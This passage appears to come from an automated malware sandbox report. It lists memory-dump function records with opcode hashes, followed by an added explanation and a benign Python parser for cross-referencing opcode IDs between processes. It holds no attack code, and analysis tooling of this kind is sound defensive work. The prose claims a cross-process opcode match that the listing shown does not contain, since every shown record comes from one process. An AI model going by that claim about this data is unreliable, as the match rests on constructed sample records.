                                                                • Source File: 0000000A.00000002.763382094.00000000017C0000.00000040.00000001.sdmp, Offset: 017C0000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 576979885656d1a56dcd755b41e999bb52ae8a82eb7af846f35e5b3081a39e0e
                                                                • Instruction ID: 19fcc259b10468ed1893162382a9ff50511748a616030d8de233be39c904ab7d
                                                                • Opcode Fuzzy Hash: 576979885656d1a56dcd755b41e999bb52ae8a82eb7af846f35e5b3081a39e0e
                                                                • Instruction Fuzzy Hash: 53318C34A00209DFDB10DF69C458BAEBBB2AF49704F1889ADE405AB361CB75DD45CBA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.763382094.00000000017C0000.00000040.00000001.sdmp, Offset: 017C0000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e11ef149503b3ee7ffb51b7ef0672349db438cfc8d3813d95e1d9bd1ec33cd24
                                                                • Instruction ID: 2cacbd6171098b9180aeb8a9e9aae3773df38446e6b5726adca1ee5010cd7fd1
                                                                • Opcode Fuzzy Hash: e11ef149503b3ee7ffb51b7ef0672349db438cfc8d3813d95e1d9bd1ec33cd24
                                                                • Instruction Fuzzy Hash: F431CE78B002169FCB64EB788854A6EBBF6EF89204B1448ADE545DB351EF30DC4287E1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.763382094.00000000017C0000.00000040.00000001.sdmp, Offset: 017C0000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e6af7c6a462ec1c441e8ccc55f931e303863d1715c777fee3b7cd03c8c4d7198
                                                                • Instruction ID: d3b90ba9bdb5ef07a86762374b7dfece8c94f90f24cc4df1405f188bc452551b
                                                                • Opcode Fuzzy Hash: e6af7c6a462ec1c441e8ccc55f931e303863d1715c777fee3b7cd03c8c4d7198
                                                                • Instruction Fuzzy Hash: 4121C538704206DFEB799F79E90873EBAA4AB84B56B60942CF807E2145DB34C840CFD1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.763235359.000000000172D000.00000040.00000001.sdmp, Offset: 0172D000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b2f7d1deaf16c51c46afb9daf616a9966b19c6a8af8d1afae20b5bfb70bc84e9
                                                                • Instruction ID: 3b0bb83be22f597068699a77ae9e6e381f6519d905b3e659569a83a691b1ed47
                                                                • Opcode Fuzzy Hash: b2f7d1deaf16c51c46afb9daf616a9966b19c6a8af8d1afae20b5bfb70bc84e9
                                                                • Instruction Fuzzy Hash: 822136B1504240DFDB21CF44D9C4B66FFA5FB88328F3485A9E9054B207C376D846C7A1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.763382094.00000000017C0000.00000040.00000001.sdmp, Offset: 017C0000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7e047315506552f7b17e3d71a8d56502827cc16f9755c6013f2948ec75ca839c
                                                                • Instruction ID: a7e1b859c3c144a2fc2f1692a406394d6492091bcefb53c2d00dc9ddd65d551b
                                                                • Opcode Fuzzy Hash: 7e047315506552f7b17e3d71a8d56502827cc16f9755c6013f2948ec75ca839c
                                                                • Instruction Fuzzy Hash: 49215338601206DFDB78AF79E51863EBAA4AB44B56B20942CF806D2141EF35C4408FE1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.763235359.000000000172D000.00000040.00000001.sdmp, Offset: 0172D000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 58f22d9110106c7f890dd78f810f365743ba8a5403f1c55b3a4a26c19b03b458
                                                                • Instruction ID: 321a536691521f8d84c11933a62dff6d3ea872dace4b285369cf2ce7a1cc342b
                                                                • Opcode Fuzzy Hash: 58f22d9110106c7f890dd78f810f365743ba8a5403f1c55b3a4a26c19b03b458
                                                                • Instruction Fuzzy Hash: 5111AF76404280CFDB12CF54D5C4B16FF71FB84324F3486A9D9054B616C376D556CBA2
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.763382094.00000000017C0000.00000040.00000001.sdmp, Offset: 017C0000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 46fac10a8b49ef4ee7a90a472818b48c949d1439a74f7a64d9b08f06c19e93d8
                                                                • Instruction ID: 012a8cb69dc8b346b6edf250f5d96c4ad8c810e9c8e75659ea643d12c6801325
                                                                • Opcode Fuzzy Hash: 46fac10a8b49ef4ee7a90a472818b48c949d1439a74f7a64d9b08f06c19e93d8
                                                                • Instruction Fuzzy Hash: EC119A74B00244DFCB64DB799554A6ABBE2EF8931831548BCC419DB322EB39CC42CB90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.763382094.00000000017C0000.00000040.00000001.sdmp, Offset: 017C0000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d6b23c36b0c0393f57b920ab851fbe8c8380d5c7c9567320af2827cc89a8b126
                                                                • Instruction ID: 54be131336b720e3ce1644a0c369bc70d4b711fd493627406643c341a0933ce2
                                                                • Opcode Fuzzy Hash: d6b23c36b0c0393f57b920ab851fbe8c8380d5c7c9567320af2827cc89a8b126
                                                                • Instruction Fuzzy Hash: 9A118E74B00204DF8B64EB79D55466AB7E6EF88659711847CC419CB311EF35DC42CB91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.763382094.00000000017C0000.00000040.00000001.sdmp, Offset: 017C0000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 76e4c81963394044aeff984dd61dd972a34a36825cbb45b22ce84dab5fabf60f
                                                                • Instruction ID: e3a9be78b66f4c33a141db4b2744c19f7a0d1b20dea26eb26dc4be305e729dfb
                                                                • Opcode Fuzzy Hash: 76e4c81963394044aeff984dd61dd972a34a36825cbb45b22ce84dab5fabf60f
                                                                • Instruction Fuzzy Hash: F6F0F9243083501FC71A933D582841E7FE79BCB59531544FEE00ACB393DE248C0643A6
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%
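The listing above is machine output and easier to work with as records than as text. Two of its entries carry the same Opcode ID (58f22d9110106c7f…) but come from dumps of two different processes (00000009 … 00FFD000 and 0000000A … 0172D000), which is the kind of cross-process overlap an analyst wants flagged rather than spotted by eye. The parser below is an added example for this page, not code from the sandbox vendor or from the report; its sample input is a constructed, trimmed copy of three records from the listing, and it assumes (an interpretation, not something the report states) that the first dotted field of the .sdmp file name is the report's hexadecimal per-process index.

```python
import re
from collections import defaultdict

# Constructed sample: three records copied from this page's function listing,
# trimmed to the fields the parser uses. Layout follows the report.
SAMPLE = """\
Executed Functions

APIs
• LoadLibraryA.KERNELBASE(?), ref: 02A06252
Memory Dump Source
• Source File: 00000009.00000002.904569926.0000000002A00000.00000040.00000001.sdmp, Offset: 02A00000, based on PE: false
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
• Opcode ID: 39411ef57097777b20e86fafdc379bc6d6afe5f0ba89481ca2fef100e4fd3c84
• Instruction ID: 45aac09e93a374bc4e025d000556152b7ffe907a8478da6a81256c728b856804
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000009.00000002.903864364.0000000000FFD000.00000040.00000001.sdmp, Offset: 00FFD000, based on PE: false
• Opcode ID: 58f22d9110106c7f890dd78f810f365743ba8a5403f1c55b3a4a26c19b03b458
• Instruction ID: 228fb0e889fb76d463f0afbe847117ac23234d4c9ccc101825bfca0ff4e8c762
Uniqueness Score: -1.00%

Non-executed Functions

Executed Functions

Memory Dump Source
• Source File: 0000000A.00000002.763235359.000000000172D000.00000040.00000001.sdmp, Offset: 0172D000, based on PE: false
• Opcode ID: 58f22d9110106c7f890dd78f810f365743ba8a5403f1c55b3a4a26c19b03b458
• Instruction ID: 321a536691521f8d84c11933a62dff6d3ea872dace4b285369cf2ce7a1cc342b
Uniqueness Score: -1.00%
"""

SOURCE_RE = re.compile(r"Source File: (?P<file>\S+), Offset: (?P<offset>[0-9A-Fa-f]+), based on PE: (?P<pe>\w+)")
API_RE = re.compile(r"(?P<func>\w+)\.(?P<module>\w+)\((?P<args>.*?)\), ref: (?P<ref>[0-9A-Fa-f]+)")
FIELD_RE = re.compile(r"(?P<key>[A-Za-z][A-Za-z ]*?):\s*(?P<val>.*)$")


def process_index(source_file):
    # Assumption: the first dotted field of the dump name is the report's
    # per-process index, written in hex (00000009 -> 9, 0000000A -> 10).
    return int(source_file.split(".")[0], 16)


def parse_listing(text):
    """Split the listing into one dict per function record."""
    records, cur, section, in_apis = [], {}, None, False

    def flush():
        nonlocal cur
        if "file" in cur:            # only records with a dump source count
            records.append(cur)
        cur = {}

    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if not line:
            continue
        if line in ("Executed Functions", "Non-executed Functions"):
            flush(); section = line; continue
        if line == "APIs":           # API bullets precede the record's dump source
            flush(); in_apis = True; cur["apis"] = []; continue
        if line == "Memory Dump Source":
            if "file" in cur:
                flush()
            in_apis = False; continue
        if in_apis:
            m = API_RE.match(line)
            if m:
                cur["apis"].append(m.groupdict())
            continue
        m = SOURCE_RE.match(line)
        if m:
            cur.update(m.groupdict())
            cur["section"] = section
            cur["process"] = process_index(m["file"])
            continue
        m = FIELD_RE.match(line)     # "Opcode ID: ...", "Uniqueness Score: ..." etc.
        if m:
            cur[m["key"]] = m["val"]
    flush()
    return records


def shared_opcode_ids(records):
    """Opcode IDs recovered from more than one process: the same function
    body present in two address spaces."""
    seen = defaultdict(set)
    for r in records:
        if "Opcode ID" in r:
            seen[r["Opcode ID"]].add(r["process"])
    return {oid: sorted(p) for oid, p in seen.items() if len(p) > 1}


def summarize(records):
    """Per-process counts and the set of resolved API calls."""
    by_proc = defaultdict(lambda: {"executed": 0, "non_executed": 0, "apis": set()})
    for r in records:
        s = by_proc[r["process"]]
        s["executed" if r["section"] == "Executed Functions" else "non_executed"] += 1
        for a in r.get("apis", []):
            s["apis"].add(f'{a["func"]}.{a["module"]}')
    return dict(by_proc)


if __name__ == "__main__":
    recs = parse_listing(SAMPLE)
    for oid, procs in shared_opcode_ids(recs).items():
        print(f"opcode {oid[:16]}... seen in processes {procs}")
    for pid, s in sorted(summarize(recs).items()):
        print(pid, s)
```

Run it on the full listing (pasted into SAMPLE or read from a file) and the shared-opcode table shows which function bodies recur across processes; a Uniqueness Score of -1.00% on every record, as here, means the report computed no similarity score, so the Opcode ID is the only cross-reference available.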

                                                                Non-executed Functions